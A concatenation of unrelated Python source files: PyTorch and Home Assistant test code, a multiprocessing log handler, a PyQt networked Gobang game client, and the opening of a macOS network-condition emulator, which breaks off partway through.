self._spawn_processes()
else:
self._fork_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
test_remote.py
|
"""Test Home Assistant remote methods and classes."""
# pylint: disable=protected-access
import asyncio
import threading
import unittest
from unittest.mock import patch
import homeassistant.core as ha
import homeassistant.bootstrap as bootstrap
import homeassistant.remote as remote
import homeassistant.components.http as http
from homeassistant.const import HTTP_HEADER_HA_AUTH, EVENT_STATE_CHANGED
import homeassistant.util.dt as dt_util
from tests.common import (
get_test_instance_port, get_test_home_assistant, get_test_config_dir)
API_PASSWORD = 'test1234'
MASTER_PORT = get_test_instance_port()
SLAVE_PORT = get_test_instance_port()
BROKEN_PORT = get_test_instance_port()
HTTP_BASE_URL = 'http://127.0.0.1:{}'.format(MASTER_PORT)
HA_HEADERS = {HTTP_HEADER_HA_AUTH: API_PASSWORD}
broken_api = remote.API('127.0.0.1', "bladybla", port=get_test_instance_port())
hass, slave, master_api = None, None, None
def _url(path=''):
"""Helper method to generate URLs."""
return HTTP_BASE_URL + path
# pylint: disable=invalid-name
def setUpModule():
"""Initalization of a Home Assistant server and Slave instance."""
global hass, slave, master_api
hass = get_test_home_assistant()
hass.bus.listen('test_event', lambda _: _)
hass.states.set('test.test', 'a_state')
bootstrap.setup_component(
hass, http.DOMAIN,
{http.DOMAIN: {http.CONF_API_PASSWORD: API_PASSWORD,
http.CONF_SERVER_PORT: MASTER_PORT}})
bootstrap.setup_component(hass, 'api')
hass.start()
master_api = remote.API('127.0.0.1', API_PASSWORD, MASTER_PORT)
# Start slave
loop = asyncio.new_event_loop()
# FIXME: should not be a daemon
threading.Thread(name='SlaveThread', daemon=True,
target=loop.run_forever).start()
slave = remote.HomeAssistant(master_api, loop=loop)
slave.async_track_tasks()
slave.config.config_dir = get_test_config_dir()
slave.config.skip_pip = True
bootstrap.setup_component(
slave, http.DOMAIN,
{http.DOMAIN: {http.CONF_API_PASSWORD: API_PASSWORD,
http.CONF_SERVER_PORT: SLAVE_PORT}})
with patch.object(ha, '_async_create_timer', return_value=None):
slave.start()
# pylint: disable=invalid-name
def tearDownModule():
"""Stop the Home Assistant server and slave."""
slave.stop()
hass.stop()
class TestRemoteMethods(unittest.TestCase):
"""Test the homeassistant.remote module."""
def tearDown(self):
"""Stop everything that was started."""
slave.block_till_done()
hass.block_till_done()
def test_validate_api(self):
"""Test Python API validate_api."""
self.assertEqual(remote.APIStatus.OK, remote.validate_api(master_api))
self.assertEqual(
remote.APIStatus.INVALID_PASSWORD,
remote.validate_api(
remote.API('127.0.0.1', API_PASSWORD + 'A', MASTER_PORT)))
self.assertEqual(
remote.APIStatus.CANNOT_CONNECT, remote.validate_api(broken_api))
def test_get_event_listeners(self):
"""Test Python API get_event_listeners."""
local_data = hass.bus.listeners
remote_data = remote.get_event_listeners(master_api)
for event in remote_data:
self.assertEqual(local_data.pop(event["event"]),
event["listener_count"])
self.assertEqual(len(local_data), 0)
self.assertEqual({}, remote.get_event_listeners(broken_api))
def test_fire_event(self):
"""Test Python API fire_event."""
test_value = []
@ha.callback
def listener(event):
"""Helper method that will verify our event got called."""
test_value.append(1)
hass.bus.listen("test.event_no_data", listener)
remote.fire_event(master_api, "test.event_no_data")
hass.block_till_done()
self.assertEqual(1, len(test_value))
# Should not trigger any exception
remote.fire_event(broken_api, "test.event_no_data")
def test_get_state(self):
"""Test Python API get_state."""
self.assertEqual(
hass.states.get('test.test'),
remote.get_state(master_api, 'test.test'))
self.assertEqual(None, remote.get_state(broken_api, 'test.test'))
def test_get_states(self):
"""Test Python API get_state_entity_ids."""
self.assertEqual(hass.states.all(), remote.get_states(master_api))
self.assertEqual([], remote.get_states(broken_api))
def test_remove_state(self):
"""Test Python API set_state."""
hass.states.set('test.remove_state', 'set_test')
self.assertIn('test.remove_state', hass.states.entity_ids())
remote.remove_state(master_api, 'test.remove_state')
self.assertNotIn('test.remove_state', hass.states.entity_ids())
def test_set_state(self):
"""Test Python API set_state."""
remote.set_state(master_api, 'test.test', 'set_test')
state = hass.states.get('test.test')
self.assertIsNotNone(state)
self.assertEqual('set_test', state.state)
self.assertFalse(remote.set_state(broken_api, 'test.test', 'set_test'))
def test_set_state_with_push(self):
"""Test Python API set_state with push option."""
events = []
hass.bus.listen(EVENT_STATE_CHANGED, lambda ev: events.append(ev))
remote.set_state(master_api, 'test.test', 'set_test_2')
remote.set_state(master_api, 'test.test', 'set_test_2')
hass.block_till_done()
self.assertEqual(1, len(events))
remote.set_state(
master_api, 'test.test', 'set_test_2', force_update=True)
hass.block_till_done()
self.assertEqual(2, len(events))
def test_is_state(self):
"""Test Python API is_state."""
self.assertTrue(
remote.is_state(master_api, 'test.test',
hass.states.get('test.test').state))
self.assertFalse(
remote.is_state(broken_api, 'test.test',
hass.states.get('test.test').state))
def test_get_services(self):
"""Test Python API get_services."""
local_services = hass.services.services
for serv_domain in remote.get_services(master_api):
local = local_services.pop(serv_domain["domain"])
self.assertEqual(local, serv_domain["services"])
self.assertEqual({}, remote.get_services(broken_api))
def test_call_service(self):
"""Test Python API services.call."""
test_value = []
@ha.callback
def listener(service_call):
"""Helper method that will verify that our service got called."""
test_value.append(1)
hass.services.register("test_domain", "test_service", listener)
remote.call_service(master_api, "test_domain", "test_service")
hass.block_till_done()
self.assertEqual(1, len(test_value))
# Should not raise an exception
remote.call_service(broken_api, "test_domain", "test_service")
def test_json_encoder(self):
"""Test the JSON Encoder."""
ha_json_enc = remote.JSONEncoder()
state = hass.states.get('test.test')
self.assertEqual(state.as_dict(), ha_json_enc.default(state))
# Default method raises TypeError if non HA object
self.assertRaises(TypeError, ha_json_enc.default, 1)
now = dt_util.utcnow()
self.assertEqual(now.isoformat(), ha_json_enc.default(now))
class TestRemoteClasses(unittest.TestCase):
"""Test the homeassistant.remote module."""
def tearDown(self):
"""Stop everything that was started."""
slave.block_till_done()
hass.block_till_done()
def test_home_assistant_init(self):
"""Test HomeAssistant init."""
# Wrong password
self.assertRaises(
ha.HomeAssistantError, remote.HomeAssistant,
remote.API('127.0.0.1', API_PASSWORD + 'A', 8124))
# Wrong port
self.assertRaises(
ha.HomeAssistantError, remote.HomeAssistant,
remote.API('127.0.0.1', API_PASSWORD, BROKEN_PORT))
def test_statemachine_init(self):
"""Test if remote.StateMachine copies all states on init."""
self.assertEqual(sorted(hass.states.all()),
sorted(slave.states.all()))
def test_statemachine_set(self):
"""Test if setting the state on a slave is recorded."""
slave.states.set("remote.test", "remote.statemachine test")
# Wait till slave tells master
slave.block_till_done()
# Wait till master gives updated state
hass.block_till_done()
self.assertEqual("remote.statemachine test",
slave.states.get("remote.test").state)
def test_statemachine_remove_from_master(self):
"""Remove statemachine from master."""
hass.states.set("remote.master_remove", "remove me!")
hass.block_till_done()
slave.block_till_done()
self.assertIn('remote.master_remove', slave.states.entity_ids())
hass.states.remove("remote.master_remove")
hass.block_till_done()
slave.block_till_done()
self.assertNotIn('remote.master_remove', slave.states.entity_ids())
def test_statemachine_remove_from_slave(self):
"""Remove statemachine from slave."""
hass.states.set("remote.slave_remove", "remove me!")
hass.block_till_done()
self.assertIn('remote.slave_remove', slave.states.entity_ids())
self.assertTrue(slave.states.remove("remote.slave_remove"))
slave.block_till_done()
hass.block_till_done()
self.assertNotIn('remote.slave_remove', slave.states.entity_ids())
def test_eventbus_fire(self):
"""Test if events fired from the eventbus get fired."""
hass_call = []
slave_call = []
hass.bus.listen("test.event_no_data", lambda _: hass_call.append(1))
slave.bus.listen("test.event_no_data", lambda _: slave_call.append(1))
slave.bus.fire("test.event_no_data")
# Wait till slave tells master
slave.block_till_done()
# Wait till master gives updated event
hass.block_till_done()
self.assertEqual(1, len(hass_call))
self.assertEqual(1, len(slave_call))
def test_get_config(self):
"""Test the return of the configuration."""
self.assertEqual(hass.config.as_dict(), remote.get_config(master_api))
|
multi_logging.py
|
from logging.handlers import RotatingFileHandler
import multiprocessing, threading, logging, sys, traceback
class MultiProcessingLog(logging.Handler):
def __init__(self, name, mode, maxsize, rotate):
logging.Handler.__init__(self)
self._handler = RotatingFileHandler(name, mode, maxsize, rotate)
self.queue = multiprocessing.Queue(-1)
t = threading.Thread(target=self.receive)
t.daemon = True
t.start()
def setFormatter(self, fmt):
logging.Handler.setFormatter(self, fmt)
self._handler.setFormatter(fmt)
def receive(self):
while True:
try:
record = self.queue.get()
self._handler.emit(record)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except:
traceback.print_exc(file=sys.stderr)
def send(self, s):
self.queue.put_nowait(s)
def _format_record(self, record):
# ensure that exc_info and args
# have been stringified. Removes any chance of
# unpickleable things inside and possibly reduces
# message size sent over the pipe
if record.args:
record.msg = record.msg % record.args
record.args = None
if record.exc_info:
dummy = self.format(record)
record.exc_info = None
return record
def emit(self, record):
try:
s = self._format_record(record)
self.send(s)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
self._handler.close()
logging.Handler.close(self)
|
client.py
|
'''
Function:
联机对战客户端
Author:
Charles
微信公众号:
Charles的皮卡丘
'''
import socket
import pygame
import random
import threading
from ..misc import *
from PyQt5 import QtCore
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from itertools import product
'''客户端'''
class GobangClient(QWidget):
back_signal = pyqtSignal()
exit_signal = pyqtSignal()
receive_signal = pyqtSignal(dict, name='data')
send_back_signal = False
def __init__(self, cfg, nickname, server_ip, parent=None, **kwargs):
super(GobangClient, self).__init__(parent)
# 预定义一些必要的变量
self.cfg = cfg
self.nickname = nickname
self.opponent_nickname = None
self.server_ipport = (server_ip, cfg.PORT)
self.is_gaming = False
self.chessboard = [[None for i in range(19)] for _ in range(19)]
self.history_record = []
self.winner = None
self.winner_info_label = None
self.player_color = 'black'
self.opponent_player_color = 'white'
self.whoseround = None
# 当前窗口的基本设置
self.setFixedSize(760, 650)
self.setWindowTitle('五子棋 —— Charles的皮卡丘')
self.setWindowIcon(QIcon(cfg.ICON_FILEPATH))
# 背景图片
palette = QPalette()
palette.setBrush(self.backgroundRole(), QBrush(QPixmap(cfg.BACKGROUND_IMAGEPATHS.get('bg_game'))))
self.setPalette(palette)
# 显示你的昵称
self.nickname_label = QLabel('您是%s' % self.nickname, self)
self.nickname_label.resize(200, 40)
self.nickname_label.move(640, 180)
# 落子标志
self.chessman_sign = QLabel(self)
sign = QPixmap(cfg.CHESSMAN_IMAGEPATHS.get('sign'))
self.chessman_sign.setPixmap(sign)
self.chessman_sign.setFixedSize(sign.size())
self.chessman_sign.show()
self.chessman_sign.hide()
# 按钮
self.home_button = PushButton(cfg.BUTTON_IMAGEPATHS.get('home'), self)
self.home_button.click_signal.connect(self.goHome)
self.home_button.move(680, 10)
self.startgame_button = PushButton(cfg.BUTTON_IMAGEPATHS.get('startgame'), self)
self.startgame_button.click_signal.connect(self.startgame)
self.startgame_button.move(640, 240)
self.regret_button = PushButton(cfg.BUTTON_IMAGEPATHS.get('regret'), self)
self.regret_button.click_signal.connect(self.regret)
self.regret_button.move(640, 310)
self.givein_button = PushButton(cfg.BUTTON_IMAGEPATHS.get('givein'), self)
self.givein_button.click_signal.connect(self.givein)
self.givein_button.move(640, 380)
self.urge_button = PushButton(cfg.BUTTON_IMAGEPATHS.get('urge'), self)
self.urge_button.click_signal.connect(self.urge)
self.urge_button.move(640, 450)
# 落子和催促声音加载
pygame.mixer.init()
self.drop_sound = pygame.mixer.Sound(cfg.SOUNDS_PATHS.get('drop'))
self.urge_sound = pygame.mixer.Sound(cfg.SOUNDS_PATHS.get('urge'))
# 接收数据信号绑定到responseForReceiveData函数
self.receive_signal.connect(self.responseForReceiveData)
# TCP/IP客户端
self.tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.tcp_socket.connect(self.server_ipport)
data = {'type': 'nickname', 'data': self.nickname}
self.tcp_socket.sendall(packSocketData(data))
self.setWindowTitle('五子棋-微信公众号: Charles的皮卡丘 ——> 已经成功连接服务器, 点击开始按钮进行游戏')
# 开一个线程进行监听
threading.Thread(target=self.receiveServerData).start()
'''返回游戏主界面'''
def goHome(self):
self.send_back_signal = True
self.close()
self.back_signal.emit()
'''开始游戏'''
def startgame(self):
self.randomAssignColor()
data = {'type': 'action', 'detail': 'startgame', 'data': [self.player_color, self.opponent_player_color]}
self.tcp_socket.sendall(packSocketData(data))
QMessageBox.information(self, '提示', '游戏开始请求已发送, 等待对方确定中')
'''认输'''
def givein(self):
if self.is_gaming and (self.winner is None) and (self.whoseround == self.player_color):
self.winner = self.opponent_player_color
self.showGameEndInfo()
data = {'type': 'action', 'detail': 'givein'}
self.tcp_socket.sendall(packSocketData(data))
'''悔棋-只有在对方回合才能悔棋'''
def regret(self):
if self.is_gaming and (self.winner is None) and (self.whoseround == self.opponent_player_color):
data = {'type': 'action', 'detail': 'regret'}
self.tcp_socket.sendall(packSocketData(data))
'''催促'''
def urge(self):
if self.is_gaming and (self.winner is None) and (self.whoseround == self.opponent_player_color):
data = {'type': 'action', 'detail': 'urge'}
self.tcp_socket.sendall(packSocketData(data))
self.urge_sound.play()
'''鼠标左键点击事件-玩家回合'''
def mousePressEvent(self, event):
if (event.buttons() != QtCore.Qt.LeftButton) or (self.winner is not None) or (self.whoseround != self.player_color) or (not self.is_gaming):
return
# 保证只在棋盘范围内响应
if event.x() >= 50 and event.x() <= 50 + 30 * 18 + 14 and event.y() >= 50 and event.y() <= 50 + 30 * 18 + 14:
pos = Pixel2Chesspos(event)
# 保证落子的地方本来没有人落子
if self.chessboard[pos[0]][pos[1]]:
return
# 实例化一个棋子并显示
c = Chessman(self.cfg.CHESSMAN_IMAGEPATHS.get(self.whoseround), self)
c.move(event.pos())
c.show()
self.chessboard[pos[0]][pos[1]] = c
# 落子声音响起
self.drop_sound.play()
# 最后落子位置标志对落子位置进行跟随
self.chessman_sign.show()
self.chessman_sign.move(c.pos())
self.chessman_sign.raise_()
# 记录这次落子
self.history_record.append([*pos, self.whoseround])
# 发送给对方自己的落子位置
data = {'type': 'action', 'detail': 'drop', 'data': pos}
self.tcp_socket.sendall(packSocketData(data))
# 是否胜利了
self.winner = checkWin(self.chessboard)
if self.winner:
self.showGameEndInfo()
return
# 切换回合方(其实就是改颜色)
self.nextRound()
'''显示游戏结束结果'''
def showGameEndInfo(self):
self.is_gaming = False
info_img = QPixmap(self.cfg.WIN_IMAGEPATHS.get(self.winner))
self.winner_info_label = QLabel(self)
self.winner_info_label.setPixmap(info_img)
self.winner_info_label.resize(info_img.size())
self.winner_info_label.move(50, 50)
self.winner_info_label.show()
'''响应接收到的数据'''
def responseForReceiveData(self, data):
if data['type'] == 'action' and data['detail'] == 'exit':
QMessageBox.information(self, '提示', '您的对手已退出游戏, 游戏将自动返回主界面')
self.goHome()
elif data['type'] == 'action' and data['detail'] == 'startgame':
self.opponent_player_color, self.player_color = data['data']
self.whoseround = 'white'
self.whoseround2nickname_dict = {self.player_color: self.nickname, self.opponent_player_color: self.opponent_nickname}
res = QMessageBox.information(self, '提示', '对方请求(重新)开始游戏, 您为%s, 您是否同意?' % {'white': '白子', 'black': '黑子'}.get(self.player_color), QMessageBox.Yes | QMessageBox.No)
if res == QMessageBox.Yes:
data = {'type': 'reply', 'detail': 'startgame', 'data': True}
self.tcp_socket.sendall(packSocketData(data))
self.is_gaming = True
self.setWindowTitle('五子棋-微信公众号: Charles的皮卡丘 ——> %s走棋' % self.whoseround2nickname_dict.get(self.whoseround))
for i, j in product(range(19), range(19)):
if self.chessboard[i][j]:
self.chessboard[i][j].close()
self.chessboard[i][j] = None
self.history_record.clear()
self.winner = None
if self.winner_info_label:
self.winner_info_label.close()
self.winner_info_label = None
self.chessman_sign.hide()
else:
data = {'type': 'reply', 'detail': 'startgame', 'data': False}
self.tcp_socket.sendall(packSocketData(data))
elif data['type'] == 'action' and data['detail'] == 'drop':
pos = data['data']
# 实例化一个棋子并显示
c = Chessman(self.cfg.CHESSMAN_IMAGEPATHS.get(self.whoseround), self)
c.move(QPoint(*Chesspos2Pixel(pos)))
c.show()
self.chessboard[pos[0]][pos[1]] = c
# 落子声音响起
self.drop_sound.play()
# 最后落子位置标志对落子位置进行跟随
self.chessman_sign.show()
self.chessman_sign.move(c.pos())
self.chessman_sign.raise_()
# 记录这次落子
self.history_record.append([*pos, self.whoseround])
# 是否胜利了
self.winner = checkWin(self.chessboard)
if self.winner:
self.showGameEndInfo()
return
# 切换回合方(其实就是改颜色)
self.nextRound()
elif data['type'] == 'action' and data['detail'] == 'givein':
self.winner = self.player_color
self.showGameEndInfo()
elif data['type'] == 'action' and data['detail'] == 'urge':
self.urge_sound.play()
elif data['type'] == 'action' and data['detail'] == 'regret':
res = QMessageBox.information(self, '提示', '对方请求悔棋, 您是否同意?', QMessageBox.Yes | QMessageBox.No)
if res == QMessageBox.Yes:
pre_round = self.history_record.pop(-1)
self.chessboard[pre_round[0]][pre_round[1]].close()
self.chessboard[pre_round[0]][pre_round[1]] = None
self.chessman_sign.hide()
self.nextRound()
data = {'type': 'reply', 'detail': 'regret', 'data': True}
self.tcp_socket.sendall(packSocketData(data))
else:
data = {'type': 'reply', 'detail': 'regret', 'data': False}
self.tcp_socket.sendall(packSocketData(data))
elif data['type'] == 'reply' and data['detail'] == 'startgame':
if data['data']:
self.is_gaming = True
self.setWindowTitle('五子棋-微信公众号: Charles的皮卡丘 ——> %s走棋' % self.whoseround2nickname_dict.get(self.whoseround))
for i, j in product(range(19), range(19)):
if self.chessboard[i][j]:
self.chessboard[i][j].close()
self.chessboard[i][j] = None
self.history_record.clear()
self.winner = None
if self.winner_info_label:
self.winner_info_label.close()
self.winner_info_label = None
self.chessman_sign.hide()
QMessageBox.information(self, '提示', '对方同意开始游戏请求, 您为%s, 执白者先行.' % {'white': '白子', 'black': '黑子'}.get(self.player_color))
else:
QMessageBox.information(self, '提示', '对方拒绝了您开始游戏的请求.')
elif data['type'] == 'reply' and data['detail'] == 'regret':
if data['data']:
pre_round = self.history_record.pop(-1)
self.chessboard[pre_round[0]][pre_round[1]].close()
self.chessboard[pre_round[0]][pre_round[1]] = None
self.nextRound()
QMessageBox.information(self, '提示', '对方同意了您的悔棋请求.')
else:
QMessageBox.information(self, '提示', '对方拒绝了您的悔棋请求.')
elif data['type'] == 'nickname':
self.opponent_nickname = data['data']
'''随机生成双方颜色-白子先走'''
def randomAssignColor(self):
self.player_color = random.choice(['white', 'black'])
self.opponent_player_color = 'white' if self.player_color == 'black' else 'black'
self.whoseround = 'white'
self.whoseround2nickname_dict = {self.player_color: self.nickname, self.opponent_player_color: self.opponent_nickname}
'''改变落子方'''
def nextRound(self):
self.whoseround = self.player_color if self.whoseround == self.opponent_player_color else self.opponent_player_color
self.setWindowTitle('五子棋-微信公众号: Charles的皮卡丘 ——> %s走棋' % self.whoseround2nickname_dict.get(self.whoseround))
'''接收服务器端数据'''
def receiveServerData(self):
while True:
data = receiveAndReadSocketData(self.tcp_socket)
self.receive_signal.emit(data)
'''关闭窗口事件'''
def closeEvent(self, event):
self.tcp_socket.sendall(packSocketData({'type': 'action', 'detail': 'exit'}))
self.tcp_socket.shutdown(socket.SHUT_RDWR)
self.tcp_socket.close()
return super().closeEvent(event)
|
emulator.py
|
# encoding: utf8
import os
import sys
import json
import copy
import psutil
import threading
import netifaces
import socket
import time
import signal
import Tkinter as tk
from macdivert import MacDivert
from tkMessageBox import showerror, showwarning
from enum import Defaults
from tkFileDialog import askopenfilename, askdirectory
from ctypes import POINTER, pointer, cast
from ctypes import (c_uint8, c_void_p, c_int32, c_char_p, c_int, c_float,
create_string_buffer, c_size_t, c_ssize_t, c_uint64)
# import pydevd
# pydevd.settrace('localhost', port=9999, stdoutToServer=True, stderrToServer=True)
__author__ = 'huangyan13@baidu.com'
class Flags(object):
# direction flags
DIRECTION_IN = 0
DIRECTION_OUT = 1
DIRECTION_UNKNOWN = 2
# feature flags
EMULATOR_IS_RUNNING = 1
EMULATOR_DUMP_PCAP = (1 << 1)
EMULATOR_RECHECKSUM = (1 << 2)
# pipe flags
PIPE_DROP = 0
PIPE_DELAY = 1
PIPE_THROTTLE = 2
PIPE_DISORDER = 3
PIPE_BITERR = 4
PIPE_DUPLICATE = 5
PIPE_BANDWIDTH = 6
PIPE_REINJECT = 7
# buffer size
EMULALTOR_BUF_SIZE = 8172
DELAY_QUEUE_SIZE = 8172
class BasicPipe(object):
def __init__(self):
self.handle = None
if Emulator.libdivert_ref is None:
raise RuntimeError("Should first instantiate an Emulator object")
else:
self._lib = Emulator.libdivert_ref
class DelayPipe(BasicPipe):
def __init__(self, delay_time, t=None,
queue_size=Flags.DELAY_QUEUE_SIZE,
ip_filter_obj=None, size_filter_obj=None):
super(DelayPipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'delay_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_size_t])
setattr(getattr(self._lib, 'delay_pipe_create'), "restype", c_void_p)
arr_len = len(delay_time)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.delay_pipe_create(ip_filter_handle, size_filter_handle, arr_len,
arr_type(*list(t)) if t else None,
arr_type(*list(delay_time)),
queue_size)
class DropPipe(BasicPipe):
def __init__(self, drop_rate, t=None,
ip_filter_obj=None, size_filter_obj=None):
super(DropPipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'drop_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float)])
setattr(getattr(self._lib, 'drop_pipe_create'), "restype", c_void_p)
arr_len = len(drop_rate)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.drop_pipe_create(ip_filter_handle, size_filter_handle, arr_len,
arr_type(*list(t)) if t else None,
arr_type(*list(drop_rate)))
class BandwidthPipe(BasicPipe):
def __init__(self, t, bandwidth, queue_size=Flags.DELAY_QUEUE_SIZE,
ip_filter_obj=None, size_filter_obj=None):
super(BandwidthPipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'bandwidth_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_size_t])
setattr(getattr(self._lib, 'bandwidth_pipe_create'), "restype", c_void_p)
arr_len = len(t)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.bandwidth_pipe_create(ip_filter_handle, size_filter_handle,
arr_len, arr_type(*list(t)),
arr_type(*list(bandwidth)),
queue_size)
class BiterrPipe(BasicPipe):
def __init__(self, t, biterr_rate, max_flip, ip_filter_obj=None, size_filter_obj=None):
super(BiterrPipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'biterr_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_int])
setattr(getattr(self._lib, 'biterr_pipe_create'), "restype", c_void_p)
arr_len = len(t)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.biterr_pipe_create(ip_filter_handle, size_filter_handle,
arr_len, arr_type(*list(t)),
arr_type(*list(biterr_rate)), max_flip)
class DisorderPipe(BasicPipe):
def __init__(self, t, disorder_rate, queue_size, max_disorder,
ip_filter_obj=None, size_filter_obj=None):
super(DisorderPipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'disorder_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_size_t, c_int])
setattr(getattr(self._lib, 'disorder_pipe_create'), "restype", c_void_p)
arr_len = len(t)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.disorder_pipe_create(ip_filter_handle, size_filter_handle,
arr_len, arr_type(*list(t)),
arr_type(*list(disorder_rate)),
queue_size, max_disorder)
class DuplicatePipe(BasicPipe):
def __init__(self, t, duplicate_rate, max_duplicate,
ip_filter_obj=None, size_filter_obj=None):
super(DuplicatePipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'duplicate_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_size_t])
setattr(getattr(self._lib, 'duplicate_pipe_create'), "restype", c_void_p)
arr_len = len(t)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.duplicate_pipe_create(ip_filter_handle, size_filter_handle, arr_len,
arr_type(*list(t)),
arr_type(*list(duplicate_rate)),
max_duplicate)
class ThrottlePipe(BasicPipe):
def __init__(self, t_start, t_end, queue_size, ip_filter_obj=None, size_filter_obj=None):
super(ThrottlePipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'throttle_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_size_t])
setattr(getattr(self._lib, 'throttle_pipe_create'), "restype", c_void_p)
arr_len = len(t_start)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.throttle_pipe_create(ip_filter_handle, size_filter_handle,
arr_len, arr_type(*list(t_start)),
arr_type(*list(t_end)),
queue_size)
class Emulator(object):
libdivert_ref = None
emulator_argtypes = {
'emulator_callback': [c_void_p, c_void_p, c_char_p, c_char_p],
'emulator_create_config': [c_void_p],
'emulator_destroy_config': [c_void_p],
'emulator_flush': [c_void_p],
'emulator_add_pipe': [c_void_p, c_void_p, c_int],
'emulator_del_pipe': [c_void_p, c_void_p, c_int],
'emulator_add_flag': [c_void_p, c_uint64],
'emulator_clear_flags': [c_void_p],
'emulator_clear_flag': [c_void_p, c_uint64],
'emulator_set_dump_pcap': [c_void_p, c_char_p],
'emulator_set_pid_list': [c_void_p, POINTER(c_int32), c_ssize_t],
'emulator_config_check': [c_void_p, c_char_p],
'emulator_is_running': [c_void_p],
'emulator_data_size': [c_void_p, c_int],
'emulator_create_ip_filter': [c_char_p, c_char_p, c_char_p, c_char_p, c_int, c_int],
'emulator_create_size_filter': [c_size_t, POINTER(c_size_t), POINTER(c_float)],
}
emulator_restypes = {
'emulator_callback': None,
'emulator_create_config': c_void_p,
'emulator_destroy_config': None,
'emulator_flush': None,
'emulator_add_pipe': c_int,
'emulator_del_pipe': c_int,
'emulator_add_flag': None,
'emulator_clear_flags': None,
'emulator_clear_flag': None,
'emulator_set_dump_pcap': None,
'emulator_set_pid_list': None,
'emulator_config_check': c_int,
'emulator_is_running': c_int,
'emulator_data_size': c_uint64,
'emulator_create_ip_filter': c_void_p,
'emulator_create_size_filter': c_void_p,
}
class PacketIPFilter(object):
def __init__(self, ip_src, ip_src_mask, ip_dst,
ip_dst_mask, port_src, port_dst):
lib = Emulator.libdivert_ref
self.handle = lib.emulator_create_ip_filter(ip_src, ip_src_mask, ip_dst,
ip_dst_mask, port_src, port_dst)
class PacketSizeFilter(object):
def __init__(self, size_arr, rate_arr):
if len(size_arr) != len(rate_arr):
raise RuntimeError('Invalid packet size filter')
arr_len = len(size_arr)
lib = Emulator.libdivert_ref
self.handle = lib.emulator_create_size_filter(len(size_arr),
(c_size_t * arr_len)(*size_arr),
(c_float * arr_len)(*rate_arr))
def __init__(self):
# get reference for libdivert
if Emulator.libdivert_ref is None:
lib_obj = MacDivert()
Emulator.libdivert_ref = lib_obj.get_reference()
# initialize prototype of functions
self._init_func_proto()
# create divert handle and emulator config
self.handle, self.config = self._create_config()
# background thread for divert loop
self.thread = None
# list to store pids
self.pid_list = []
# error information
self.errmsg = create_string_buffer(Defaults.DIVERT_ERRBUF_SIZE)
self.quit_loop = False
self.is_waiting = False
def __del__(self):
lib = self.libdivert_ref
lib.emulator_destroy_config(self.config)
if lib.divert_close(self.handle) != 0:
raise RuntimeError('Divert handle could not be cleaned.')
def _init_func_proto(self):
# set the types of parameters
for func_name, argtypes in self.emulator_argtypes.items():
# first check if function exists
if not hasattr(self.libdivert_ref, func_name):
raise RuntimeError("Not a valid libdivert library")
setattr(getattr(self.libdivert_ref, func_name), "argtypes", argtypes)
# set the types of return value
for func_name, restype in self.emulator_restypes.items():
